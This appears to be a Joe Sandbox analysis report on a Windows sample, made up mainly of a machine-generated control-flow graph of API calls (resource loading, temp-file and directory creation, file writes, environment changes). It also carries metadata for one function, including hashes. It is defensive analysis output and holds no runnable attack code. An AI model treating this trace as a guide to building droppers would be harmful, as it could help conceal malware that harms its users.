HeapFree 9019->9020 9021 403bc1 9020->9021 9022 40e5f0 HeapFree 9021->9022 9023 403bca 9022->9023 9024 40e5f0 HeapFree 9023->9024 9025 403bd3 9024->9025 9026 40e5f0 HeapFree 9025->9026 9027 403bdc 9026->9027 9028 40e5f0 HeapFree 9027->9028 9029 403be5 9028->9029 9030 40e520 GetLastError TlsGetValue SetLastError 9029->9030 9030->7911 9032 40e660 21 API calls 9031->9032 9033 401e70 9032->9033 9034 4051a0 3 API calls 9033->9034 9035 401e79 9034->9035 9955 40e520 GetLastError TlsGetValue SetLastError 9035->9955 9037 401e7f 9956 40e520 GetLastError TlsGetValue SetLastError 9037->9956 9039 401e87 9040 409698 7 API calls 9039->9040 9041 401e8e 9040->9041 9042 40e560 3 API calls 9041->9042 9043 401e98 PathQuoteSpacesW 9042->9043 9044 401ef1 9043->9044 9045 401ea8 9043->9045 10025 40e520 GetLastError TlsGetValue SetLastError 9044->10025 9959 40e520 GetLastError TlsGetValue SetLastError 9045->9959 9048 401eae 9960 40249d 9048->9960 9049 401efa 9051 40e6c0 4 API calls 9049->9051 9053 401f02 9051->9053 9055 40e560 3 API calls 9053->9055 9074 401eef 9055->9074 9060 401f16 9062 40e6c0 4 API calls 9060->9062 9064 401f1e 9062->9064 9958 405170 TlsGetValue 9064->9958 9069 401f25 9070 40e5f0 HeapFree 9069->9070 9073 401f3c 9070->9073 9075 40e5f0 HeapFree 9073->9075 9957 40e520 GetLastError TlsGetValue SetLastError 9074->9957 9076 401f45 9075->9076 9076->7914 9078 40e660 21 API calls 9077->9078 9079 403c91 9078->9079 9080 405060 2 API calls 9079->9080 9081 403c9d 9080->9081 9082 405060 2 API calls 9081->9082 9083 403caa 9082->9083 9084 405060 2 API calls 9083->9084 9085 403cb7 9084->9085 9086 405060 2 API calls 9085->9086 9087 403cc4 9086->9087 10056 40e520 GetLastError TlsGetValue SetLastError 9087->10056 9089 403cd0 9090 40e6c0 4 API calls 9089->9090 9091 403cd8 9090->9091 9178 4054b1 EnterCriticalSection 9177->9178 9179 404601 9177->9179 9180 4054f7 9178->9180 9186 4054c7 9178->9186 9179->7921 9181 40e1f2 HeapAlloc 9180->9181 9183 405511 LeaveCriticalSection 9181->9183 9182 4054c8 WaitForSingleObject 9184 4054d8 CloseHandle 9182->9184 9182->9186 9183->9179 9185 40e1b2 HeapFree 9184->9185 9185->9186 9186->9180 9186->9182 9188 40e660 21 API calls 9187->9188 9189 402c63 9188->9189 9190 405060 2 API calls 9189->9190 9191 402c6f 9190->9191 9192 402c9c 9191->9192 10220 40e520 GetLastError TlsGetValue SetLastError 9191->10220 10222 40e520 GetLastError TlsGetValue SetLastError 9192->10222 9195 402ca2 10223 40e520 GetLastError TlsGetValue SetLastError 9195->10223 9196 402c7e 10221 40e520 GetLastError TlsGetValue SetLastError 9196->10221 9199 402caa 10224 40e520 GetLastError TlsGetValue SetLastError 9199->10224 9200 402c86 9202 40a240 4 API calls 9200->9202 9204 402c92 9202->9204 9203 402cb2 10225 40e520 GetLastError TlsGetValue SetLastError 9203->10225 9205 40e560 3 API calls 9204->9205 9205->9192 9207 402cba 9208 40d780 8 API calls 9207->9208 9209 402cca 9208->9209 10226 405182 TlsGetValue 9209->10226 9211 402ccf 9302 40e780 9252->9302 9256 402b73 9255->9256 9256->9256 9257 40e660 21 API calls 9256->9257 9258 402b85 GetNativeSystemInfo 9257->9258 9259 402b98 9258->9259 9259->8356 9259->8357 9260->8382 9261->8389 9263 4055a1 9262->9263 9267 403269 9262->9267 9263->9267 9308 40552c memset GetModuleHandleW 9263->9308 9266 4055df GetVersionExW 9266->9267 9267->8357 9268->8365 9269->8369 9271 40e900 3 API calls 9270->9271 9272 40329b 9271->9272 9272->8375 9273->8379 9274->8395 9275->8411 9311 40db18 EnterCriticalSection 9276->9311 9278 40b455 9279 40b4ee 9278->9279 9280 40b45f CreateFileW 9278->9280 9279->8421 9281 40b480 9280->9281 9283 40b4a0 9280->9283 9281->9283 9284 40b48d HeapAlloc 9281->9284 9285 40b4e5 9283->9285 9321 40da8a EnterCriticalSection 9283->9321 9284->9283 9285->8421 9287 40b069 9286->9287 9288 40b05a 9286->9288 9329 40dad9 EnterCriticalSection 9287->9329 9289 40e075 2 API calls 9288->9289 9291 40b065 9289->9291 9291->8422 9293 40b0ad 9293->8422 9294 40b099 CloseHandle 9296 40da8a 4 API calls 9294->9296 9296->9293 9297 40b088 HeapFree 9297->9294 9298->8430 9299->8432 9300->8364 9301->8368 9303 40324e 9302->9303 9304 40e78a wcslen HeapAlloc 9302->9304 9303->8352 9306 40ea40 9304->9306 9307 40ea50 9306->9307 9307->9303 9309 405554 GetProcAddress 9308->9309 9310 405564 9308->9310 9309->9310 9310->9266 9310->9267 9312 40db32 9311->9312 9313 40db47 9311->9313 9316 40e1f2 HeapAlloc 9312->9316 9314 40db6c 9313->9314 9315 40db4c HeapReAlloc 9313->9315 9317 40db81 HeapAlloc 9314->9317 9318 40db75 9314->9318 9315->9314 9319 40db41 9316->9319 9317->9318 9320 40db9d LeaveCriticalSection 9318->9320 9319->9320 9320->9278 9322 40dac1 9321->9322 9323 40daa2 9321->9323 9325 40e1b2 HeapFree 9322->9325 9323->9322 9324 40daa7 9323->9324 9326 40dab0 memset 9324->9326 9327 40dacd LeaveCriticalSection 9324->9327 9328 40dacb 9325->9328 9326->9327 9327->9285 9328->9327 9330 40daf2 9329->9330 9331 40dafd LeaveCriticalSection 9329->9331 9330->9331 9332 40b076 9331->9332 9332->9293 9332->9294 9333 40b0c0 9332->9333 9334 40b0d4 WriteFile 9333->9334 9335 40b0fc 9333->9335 9334->9297 9335->9297 9337 40a228 RtlAllocateHeap 9336->9337 9338 40a23a 9336->9338 9337->8457 9338->8457 9353 40ee80 9339->9353 9341 402ed0 9341->8461 9343 40e660 21 API calls 9342->9343 9344 40266d LoadResource SizeofResource 9343->9344 9345 40a220 RtlAllocateHeap 9344->9345 9346 40269a 9345->9346 9372 40a300 memcpy 9346->9372 9348 4026b1 FreeResource 9349 4026c1 9348->9349 9350 40477d 9349->9350 9373 40a1e0 9350->9373 9352 404786 9352->8453 9354 40ee98 __fprintf_l 9353->9354 9356 40ef4a __fprintf_l 9354->9356 9357 40eff0 9354->9357 9356->9341 9358 40fa52 9357->9358 9361 40f000 __fprintf_l 9357->9361 9358->9354 9359 40f5d7 9363 40f644 __fprintf_l 9359->9363 9364 410b90 9359->9364 9361->9358 9361->9359 9362 40f4ef memcpy 9361->9362 9362->9361 9363->9354 9365 410ba4 9364->9365 9366 410c12 memcpy 9365->9366 9367 410bec memcpy 9365->9367 9368 410bbf 9365->9368 9370 410c39 memcpy 9366->9370 9371 410c58 9366->9371 9367->9363 9368->9363 9370->9363 9371->9363 9372->9348 9374 40a1e8 HeapSize 9373->9374 9375 40a1fa 9373->9375 9374->9352 9375->9352 9376->8474 9377->8482 9378->8473 9379->8477 9380->8481 9381->8484 9383 40a2a9 9382->9383 9384 40a299 9382->9384 9385 40e900 3 API calls 9383->9385 9484 40a240 9384->9484 9390 40a2bf 9385->9390 9389 40a2e8 9389->8488 9490 40ea90 TlsGetValue 9390->9490 9391->8493 9491 405f90 9392->9491 9394 4021bd 9394->8499 9395->8502 9396->8504 9397->8506 9398->8508 9399->8512 9400->8518 9401->8520 9402->8522 9403->8524 9405 40590f 9404->9405 9412 405801 9404->9412 9501 40e9e0 TlsGetValue 9405->9501 9407 405918 9407->8526 9408 405886 9410 40e880 TlsGetValue 9408->9410 9409 405850 wcsncmp 9409->9412 9411 4058c7 9410->9411 9413 4058e9 9411->9413 9500 40e8d0 TlsGetValue 9411->9500 9412->9408 9412->9409 9415 40e900 3 API calls 9413->9415 9417 4058f0 9415->9417 9416 4058d7 memmove 9416->9413 9418 405901 9417->9418 9419 4058f6 wcsncpy 9417->9419 9418->8526 9419->9418 9420->8528 9421->8530 9422->8532 9423->8536 9424->8538 9502 408e58 9425->9502 9427 408f81 9428 408e58 3 API calls 9427->9428 9429 408f90 9428->9429 9430 408e58 3 API calls 9429->9430 9431 408fa3 9430->9431 9432 408fb0 GetStockObject 9431->9432 9433 408fbd LoadIconW LoadCursorW RegisterClassExW 9431->9433 9432->9433 9506 4094d1 GetForegroundWindow 9433->9506 9438 409047 IsWindowEnabled 9439 40906b 9438->9439 9440 409052 EnableWindow 9438->9440 9441 4094d1 3 API calls 9439->9441 9440->9439 9442 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9441->9442 9443 4092ba 9442->9443 9444 4090cb SetWindowLongW CreateWindowExW SendMessageW 9442->9444 9445 4092cd 9443->9445 9520 40e9e0 TlsGetValue 9443->9520 9446 409125 9444->9446 9447 409128 CreateWindowExW SendMessageW SetFocus 9444->9447 9521 408e9a 9445->9521 9446->9447 9450 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9447->9450 9451 40917b SendMessageW wcslen wcslen SendMessageW 9447->9451 9452 40926a 9450->9452 9451->9450 9455 409273 9452->9455 9456 40922e GetMessageW 9452->9456 9454 408e9a HeapFree 9457 4092df 9454->9457 9459 409277 DestroyAcceleratorTable 9455->9459 9460 40927e 9455->9460 9456->9455 9458 409243 TranslateAcceleratorW 9456->9458 9461 408e9a HeapFree 9457->9461 9458->9452 9462 409254 TranslateMessage DispatchMessageW 9458->9462 9459->9460 9460->9443 9463 409285 wcslen 9460->9463 9464 402291 9461->9464 9462->9452 9465 40e900 3 API calls 9463->9465 9464->8541 9466 40929c wcscpy HeapFree 9465->9466 9466->9443 9467->8547 9468->8549 9469->8551 9470->8553 9471->8557 9472->8564 9473->8566 9474->8568 9475->8572 9476->8574 9478 4094d1 3 API calls 9477->9478 9479 408e2d 9478->9479 9480 409588 16 API calls 9479->9480 9481 408e36 MessageBoxW 9480->9481 9482 409588 16 API calls 9481->9482 9483 40234b 9482->9483 9483->8577 9485 40a24d 9484->9485 9486 40e900 3 API calls 9485->9486 9487 40a26b 9486->9487 9488 40a271 memcpy 9487->9488 9489 40a27f 9487->9489 9488->9489 9489->8488 9490->9389 9493 405fa1 9491->9493 9492 40e880 TlsGetValue 9494 406014 9492->9494 9493->9492 9493->9493 9495 40e900 3 API calls 9494->9495 9496 406022 9495->9496 9498 406032 9496->9498 9499 40ea10 TlsGetValue 9496->9499 9498->9394 9499->9498 9500->9416 9501->9407 9503 408e60 wcslen HeapAlloc 9502->9503 9504 408e96 9502->9504 9503->9504 9505 408e86 wcscpy 9503->9505 9504->9427 9505->9427 9507 409032 9506->9507 9508 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9506->9508 9509 409588 9507->9509 9508->9507 9510 409592 EnumWindows 9509->9510 9515 4095dd 9509->9515 9511 40903e 9510->9511 9512 4095af 9510->9512 9524 409507 GetWindowThreadProcessId GetCurrentThreadId 9510->9524 9511->9438 9511->9439 9512->9511 9514 4095b1 GetCurrentThreadId 9512->9514 9517 4095c4 SetWindowPos 9512->9517 9513 4095ea GetCurrentThreadId 9513->9515 9514->9512 9515->9511 9515->9513 9516 409600 EnableWindow 9515->9516 9518 409611 SetWindowPos 9515->9518 9519 40e1b2 HeapFree 9515->9519 9516->9515 9517->9512 9518->9515 9519->9515 9520->9445 9522 408ea1 HeapFree 9521->9522 9523 408eb3 9521->9523 9522->9523 9523->9454 9525 409525 IsWindowVisible 9524->9525 9526 40957f 9524->9526 9525->9526 9527 409530 9525->9527 9528 40e1f2 HeapAlloc 9527->9528 9529 40953c GetCurrentThreadId GetWindowLongW 9528->9529 9530 40955a 9529->9530 9531 40955e GetForegroundWindow 9529->9531 9530->9531 9531->9526 9532 409568 IsWindowEnabled 9531->9532 9532->9526 9533 409573 EnableWindow 9532->9533 9533->9526 9534->8586 9535->8589 9537 40e900 3 API calls 9536->9537 9538 40ade9 GetTempPathW LoadLibraryW 9537->9538 9539 40ae24 9538->9539 9540 40ae06 GetProcAddress 9538->9540 9562 40ea90 TlsGetValue 9539->9562 9541 40ae16 GetLongPathNameW 9540->9541 9542 40ae1d FreeLibrary 9540->9542 9541->9542 9542->9539 9544 401a1e 9544->8593 9545->8596 9546->8600 9563 40ae39 9547->9563 9550 40ad45 9551 40ad54 wcsncpy wcslen 9550->9551 9552 401a7b GetTempFileNameW 9550->9552 9553 40ad88 CreateDirectoryW 9551->9553 9555 40e520 GetLastError TlsGetValue SetLastError 9552->9555 9553->9552 9555->8611 9556->8613 9557->8623 9558->8625 9559->8633 9560->8635 9561->8641 9562->9544 9564 40ae40 9563->9564 9565 401a70 9563->9565 9566 40ae56 DeleteFileW 9564->9566 9567 40ae47 SetFileAttributesW 9564->9567 9565->9550 9566->9565 9567->9566 9568->8654 9570 40afe1 SetCurrentDirectoryW 9569->9570 9571 404759 9569->9571 9570->9571 9571->8663 9572->8741 9573->8775 9574->8683 9575->8694 9577 40e900 3 API calls 9576->9577 9578 40ae87 GetCurrentDirectoryW 9577->9578 9579 40ae97 9578->9579 9645 40ea90 TlsGetValue 9579->9645 9581 403578 9581->8718 9582->8689 9583->8695 9584->8709 9586 40e900 3 API calls 9585->9586 9587 40aecf 9586->9587 9588 40aede LoadLibraryW 9587->9588 9597 40af69 9587->9597 9590 40af4b 9588->9590 9591 40aeef GetProcAddress 9588->9591 9589 40af9b 9652 40ea90 TlsGetValue 9589->9652 9646 40afec SHGetFolderLocation 9590->9646 9594 40af40 FreeLibrary 9591->9594 9595 40af04 9591->9595 9594->9589 9594->9590 9595->9594 9600 40af16 wcscpy wcscat wcslen CoTaskMemFree 9595->9600 9597->9589 9598 40afec 4 API calls 9597->9598 9598->9589 9599 4035d8 9599->8738 9600->9594 9601->8698 9602->8713 9603->8710 9604->8729 9605->8715 9606->8734 9607->8722 9608->8742 9609->8735 9610->8757 9611->8743 9612->8761 9613->8758 9614->8767 9615->8762 9616->8777 9618 409368 CoInitialize 9617->9618 9619 409379 memset LoadLibraryW 9617->9619 9618->9619 9620 4093a3 GetProcAddress GetProcAddress 9619->9620 9621 4094ab 9619->9621 9622 4093d2 wcsncpy wcslen 9620->9622 9623 4093cd 9620->9623 9624 40e900 3 API calls 9621->9624 9625 409401 9622->9625 9623->9622 9626 4094b8 9624->9626 9627 4094d1 3 API calls 9625->9627 9653 40ea90 TlsGetValue 9626->9653 9628 40941f 9627->9628 9630 409588 16 API calls 9628->9630 9632 409442 9630->9632 9631 403772 9631->8789 9633 409588 16 API calls 9632->9633 9634 409457 9633->9634 9635 40949f FreeLibrary 9634->9635 9636 40e900 3 API calls 9634->9636 9635->9621 9635->9626 9637 409468 CoTaskMemFree wcslen 9636->9637 9637->9635 9639 409493 9637->9639 9639->9635 9641 4056e1 timeBeginPeriod 9640->9641 9642 4056f3 Sleep 9640->9642 9641->9642 9643->8763 9644->8778 9645->9581 9647 40b00b SHGetPathFromIDListW 9646->9647 9648 40af53 wcscat wcslen 9646->9648 9649 40b035 CoTaskMemFree 9647->9649 9650 40b019 wcslen 9647->9650 9648->9589 9649->9648 9650->9649 9651 40b026 9650->9651 9651->9649 9652->9599 9653->9631 9654->8811 9655->8813 9656->8819 9657->8821 9658->8825 9659->8842 9660->8844 9661->8847 9662->8850 9663->8856 9664->8863 9665->8865 9666->8867 9667->8869 9668->8873 9669->8879 9670->8881 9671->8883 9672->8885 9673->8889 9674->8895 9675->8897 9676->8899 9677->8901 9678->8905 9679->8911 9680->8913 9681->8915 9682->8917 9683->8921 9684->8927 9686 40e660 21 API calls 9685->9686 9687 403e43 9686->9687 9688 4051a0 3 API calls 9687->9688 9689 403e4c 9688->9689 9690 405060 2 API calls 9689->9690 9691 403e58 FindResourceW 9690->9691 9692 403f13 9691->9692 9693 403e7b 9691->9693 9815 40e520 GetLastError TlsGetValue SetLastError 9692->9815 9694 402664 26 API calls 9693->9694 9696 403e8a 9694->9696 9698 40477d HeapSize 9696->9698 9697 403f1d 9699 40e6c0 4 API calls 9697->9699 9700 403e97 9698->9700 9701 403f25 9699->9701 9762 4011ef 9700->9762 9816 405170 TlsGetValue 9701->9816 9705 403f2c 9709 40e5f0 HeapFree 9705->9709 9706 403eba 9786 40478d 9706->9786 9707 403edc 9802 40e520 GetLastError TlsGetValue SetLastError 9707->9802 9712 403f43 9709->9712 9711 403ee2 9803 40e520 GetLastError TlsGetValue SetLastError 9711->9803 9715 40e5f0 HeapFree 9712->9715 9718 403a0d 9715->9718 9717 403eea 9804 40a330 9717->9804 9718->8930 9719 403eda 9817 40e750 TlsGetValue 9719->9817 9722 403f00 9723 40e560 3 API calls 9722->9723 9724 403f0a 9723->9724 9814 40a200 HeapFree 9724->9814 9726->8933 9727->8939 9728->8945 9729->8951 9730->8957 9731->8959 9732->8961 9733->8965 9734->8967 9894 406310 9735->9894 9738->8973 9739->8975 9740->8977 9741->8981 9742->8983 9743->8989 9744->8991 9745->9003 9746->9005 9748 405060 2 API calls 9747->9748 9749 4023cb 9748->9749 9750 405060 2 API calls 9749->9750 9751 4023d8 9750->9751 9923 40b330 9751->9923 9755 402403 9756 40b050 11 API calls 9755->9756 9757 402410 9756->9757 9758 40e5f0 HeapFree 9757->9758 9759 402437 9758->9759 9760 40e5f0 HeapFree 9759->9760 9761 402440 9760->9761 9761->9008 9763 4011f7 9762->9763 9763->9763 9764 405060 2 API calls 9763->9764 9765 401210 9764->9765 9818 405700 9765->9818 9768 40a1e0 HeapSize 9769 401225 9768->9769 9770 40e266 4 API calls 9769->9770 9771 401247 9770->9771 9772 40e266 4 API calls 9771->9772 9773 401265 9772->9773 9774 40e266 4 API calls 9773->9774 9775 4014bd 9774->9775 9776 40e266 4 API calls 9775->9776 9777 4014db 9776->9777 9825 40a200 HeapFree 9777->9825 9779 4014e4 9780 40e5f0 HeapFree 9779->9780 9781 4014f4 9780->9781 9782 40e3b9 2 API calls 9781->9782 9783 4014fe 9782->9783 9784 40e3b9 2 API calls 9783->9784 9785 401507 9784->9785 9785->9706 9785->9707 9787 40e660 21 API calls 9786->9787 9788 40479b 9787->9788 9789 405060 2 API calls 9788->9789 9790 4047a7 9789->9790 9791 4047ba 9790->9791 9826 402447 9790->9826 9793 4047cb 9791->9793 9835 40b350 9791->9835 9795 40e5f0 HeapFree 9793->9795 9796 403ed1 9795->9796 9801 40a200 HeapFree 9796->9801 9797 4047dd 9797->9793 9800 40481d 9797->9800 9846 40b630 9797->9846 9799 40b050 11 API calls 9799->9793 9800->9799 9801->9719 9802->9711 9803->9717 9806 40a350 9804->9806 9808 40a3a8 9804->9808 9805 40e900 3 API calls 9807 40a379 9805->9807 9806->9805 9893 40ea90 TlsGetValue 9807->9893 9809 40a403 MultiByteToWideChar 9808->9809 9811 40e900 3 API calls 9809->9811 9813 40a420 MultiByteToWideChar 9811->9813 9812 40a39d 9812->9722 9813->9722 9814->9692 9815->9697 9816->9705 9817->9705 9819 405710 WideCharToMultiByte 9818->9819 9820 40570b 9818->9820 9821 40a220 RtlAllocateHeap 9819->9821 9820->9819 9822 405730 9821->9822 9823 405736 WideCharToMultiByte 9822->9823 9824 401218 9822->9824 9823->9824 9824->9768 9825->9779 9827 405060 2 API calls 9826->9827 9828 402458 9827->9828 9857 40b420 9828->9857 9831 40247f 9833 40e5f0 HeapFree 9831->9833 9832 40b050 11 API calls 9832->9831 9834 402497 9833->9834 9834->9791 9836 40db18 5 API calls 9835->9836 9837 40b365 9836->9837 9838 40b417 9837->9838 9839 40b36f CreateFileW 9837->9839 9838->9797 9840 40b390 CreateFileW 9839->9840 9841 40b3ac 9839->9841 9840->9841 9844 40b3cd 9840->9844 9842 40b3b9 HeapAlloc 9841->9842 9841->9844 9842->9844 9843 40da8a 4 API calls 9845 40b40e 9843->9845 9844->9843 9844->9845 9845->9797 9847 40b695 9846->9847 9848 40b642 9846->9848 9847->9800 9849 40b68d 9848->9849 9850 40dad9 2 API calls 9848->9850 9849->9800 9851 40b65a 9850->9851 9852 40b683 9851->9852 9853 40b672 WriteFile 9851->9853 9854 40b664 9851->9854 9852->9800 9853->9852 9882 40b6a0 9854->9882 9856 40b66c 9856->9800 9860 40b140 9857->9860 9859 40246b 9859->9831 9859->9832 9861 40b158 9860->9861 9862 40db18 5 API calls 9861->9862 9863 40b16f 9862->9863 9864 40b322 9863->9864 9865 40b182 9863->9865 9866 40b1be 9863->9866 9864->9859 9867 40b199 9865->9867 9868 40b19c CreateFileW 9865->9868 9869 40b1c3 9866->9869 9870 40b1fc 9866->9870 9867->9868 9875 40b268 9868->9875 9871 40b1da 9869->9871 9872 40b1dd CreateFileW 9869->9872 9873 40b227 CreateFileW 9870->9873 9870->9875 9871->9872 9872->9875 9874 40b249 CreateFileW 9873->9874 9873->9875 9874->9875 9876 40b2a2 9875->9876 9878 40b28e HeapAlloc 9875->9878 9879 40b2f0 9875->9879 9876->9879 9880 40b2dc SetFilePointer 9876->9880 9877 40da8a 4 API calls 9877->9864 9878->9876 9879->9877 9881 40b301 9879->9881 9880->9879 9881->9859 9883 40b7a7 9882->9883 9884 40b6ba 9882->9884 9883->9856 9885 40b6c0 SetFilePointer 9884->9885 9886 40b6eb 9884->9886 9885->9886 9888 40b0c0 WriteFile 9886->9888 9890 40b6f7 9886->9890 9887 40b727 9887->9856 9889 40b76e 9888->9889 9889->9890 9891 40b775 WriteFile 9889->9891 9890->9887 9892 40b711 memcpy 9890->9892 9891->9856 9892->9856 9893->9812 9895 40631f 9894->9895 9896 406438 9895->9896 9906 4063ae 9895->9906 9897 40e880 TlsGetValue 9896->9897 9898 406442 9897->9898 9899 40645a 9898->9899 9900 40644a _wcsdup 9898->9900 9901 40e880 TlsGetValue 9899->9901 9900->9899 9902 406460 9901->9902 9903 406477 9902->9903 9904 406468 _wcsdup 9902->9904 9905 40e880 TlsGetValue 9903->9905 9904->9903 9907 406480 9905->9907 9908 4063fc wcsncpy 9906->9908 9910 403ad4 9906->9910 9909 406488 _wcsdup 9907->9909 9913 406498 9907->9913 9908->9906 9909->9913 9910->8970 9911 40e900 3 API calls 9912 406520 9911->9912 9914 406572 wcsncpy 9912->9914 9915 406526 9912->9915 9916 40658d 9912->9916 9913->9911 9914->9916 9917 4065e4 9915->9917 9918 4065db free 9915->9918 9916->9915 9922 406625 wcsncpy 9916->9922 9919 4065f7 9917->9919 9920 4065eb free 9917->9920 9918->9917 9919->9910 9921 4065fe free 9919->9921 9920->9919 9921->9910 9922->9916 9924 40b140 15 API calls 9923->9924 9925 4023eb 9924->9925 9925->9757 9926 40b600 9925->9926 9927 40dad9 2 API calls 9926->9927 9928 40b60f 9927->9928 9929 40b623 9928->9929 9932 40b500 9928->9932 9929->9755 9931 40b620 9931->9755 9933 40b5f4 9932->9933 9934 40b514 9932->9934 9933->9931 9934->9933 9935 40b528 9934->9935 9936 40b58d 9934->9936 9937 40b560 9935->9937 9938 40b538 9935->9938 9950 40b7b0 WideCharToMultiByte 9936->9950 9937->9937 9940 40b56b WriteFile 9937->9940 9943 40b6a0 4 API calls 9938->9943 9940->9931 9941 40b5a7 9942 40b5eb 9941->9942 9944 40b5b7 9941->9944 9945 40b5c8 WriteFile 9941->9945 9942->9931 9946 40b55a 9943->9946 9947 40b6a0 4 API calls 9944->9947 9948 40b5dc HeapFree 9945->9948 9946->9931 9949 40b5c2 9947->9949 9948->9942 9949->9948 9951 40b7d5 HeapAlloc 9950->9951 9952 40b80e 9950->9952 9953 40b809 9951->9953 9954 40b7ec WideCharToMultiByte 9951->9954 9952->9941 9953->9941 9954->9953 9955->9037 9956->9039 9957->9060 9958->9069 9959->9048 9961 4024a3 9960->9961 9961->9961 9962 40e660 21 API calls 9961->9962 9963 4024b5 9962->9963 9964 4051a0 3 API calls 9963->9964 9984 4024be 9964->9984 9965 40253f 10026 40e520 GetLastError TlsGetValue SetLastError 9965->10026 9967 402545 10027 40e520 GetLastError TlsGetValue SetLastError 9967->10027 9969 40254d GetCommandLineW 9971 40a240 4 API calls 9969->9971 9970 405dc0 3 API calls 9970->9984 9972 40255a 9971->9972 9974 40e560 3 API calls 9972->9974 9973 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9973->9984 9975 402564 9974->9975 10028 40e520 GetLastError TlsGetValue SetLastError 9975->10028 9976 40e520 GetLastError TlsGetValue SetLastError 9976->9984 9978 40256e 9979 40e6c0 4 API calls 9978->9979 9980 402576 9979->9980 9982 40e560 3 API calls 9980->9982 9981 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9981->9984 9983 402580 PathRemoveArgsW 9982->9983 9985 402597 9983->9985 9984->9965 9984->9970 9984->9973 9984->9976 9984->9981 9986 4025fd 9985->9986 10029 40e520 GetLastError TlsGetValue SetLastError 9985->10029 9988 4099a5 SetEnvironmentVariableW 9986->9988 9990 40260a 9988->9990 9989 4025a9 9991 40e6c0 4 API calls 9989->9991 10042 40e520 GetLastError TlsGetValue SetLastError 9990->10042 9993 4025b6 9991->9993 10030 40e520 GetLastError TlsGetValue SetLastError 9993->10030 9994 402614 9996 40e6c0 4 API calls 9994->9996 9998 40261c 9996->9998 9997 4025bc 10031 40e520 GetLastError TlsGetValue SetLastError 9997->10031 10043 405170 TlsGetValue 9998->10043 10001 4025c4 10032 40e520 GetLastError TlsGetValue SetLastError 10001->10032 10002 402623 10004 40e5f0 HeapFree 10002->10004 10006 40263b 10004->10006 10005 4025cc 10033 40e520 GetLastError TlsGetValue SetLastError 10005->10033 10008 40e5f0 HeapFree 10006->10008 10011 402644 10008->10011 10009 4025d4 10034 406110 10009->10034 10025->9049 10026->9967 10027->9969 10028->9978 10029->9989 10030->9997 10031->10001 10032->10005 10033->10009 10042->9994 10043->10002 10056->9089 10220->9196 10221->9200 10222->9195 10223->9199 10224->9203 10225->9207 10226->9211 10459->7949 10460->7951 10461->7953 10462->7955 10463->7959 10464->7965 10465->7967 10466->7969 10467->7971 10468->7975 10469->7983 10470->7989 10471->7991 10472->7998 10473->8000 10474->8002 10475->8004 10476->8008 10477->8014 10478->8016 10479->8018 10480->8020 10481->8024 10482->8030 10483->8036 10484->8042 10485->8044 10486->8050 10487->8056 10728 402e03 10729 40e660 21 API calls 10728->10729 10730 402e09 10729->10730 10731 40ab74 5 API calls 10730->10731 10732 402e14 10731->10732 10741 40e520 GetLastError TlsGetValue SetLastError 10732->10741 10734 402e1a 10742 40e520 GetLastError TlsGetValue SetLastError 10734->10742 10736 402e22 10737 40a240 4 API calls 10736->10737 10738 402e2d 10737->10738 10739 40e560 3 API calls 10738->10739 10740 402e3c 10739->10740 10741->10734 10742->10736 10773 406289 10774 406290 10773->10774 10774->10774 10777 40ea90 TlsGetValue 10774->10777 10776 4062b5 10777->10776 10488 40b6a0 10489 40b7a7 10488->10489 10490 40b6ba 10488->10490 10491 40b6c0 SetFilePointer 10490->10491 10492 40b6eb 10490->10492 10491->10492 10494 40b0c0 WriteFile 10492->10494 10496 40b6f7 10492->10496 10493 40b727 10495 40b76e 10494->10495 10495->10496 10497 40b775 WriteFile 10495->10497 10496->10493 10498 40b711 memcpy 10496->10498

                                                                        Executed Functions

                                                                        Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                                                                          • Part of subcall function 0040E900: HeapReAlloc.KERNEL32(007C0000,00000000,?,?), ref: 0040E967
                                                                        • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
                                                                        • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
                                                                        • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                                        • String ID: GetLongPathNameW$Kernel32.DLL
                                                                        • API String ID: 820969696-2943376620
                                                                        • Opcode ID: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
                                                                        • Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
                                                                        • Opcode Fuzzy Hash: d689e7c6ef715de522d1227690b0767884cdf769d34ed9e685d0497adf4c9375
                                                                        • Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD
                                                                        Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395memorypipesynchronizationCOMMON
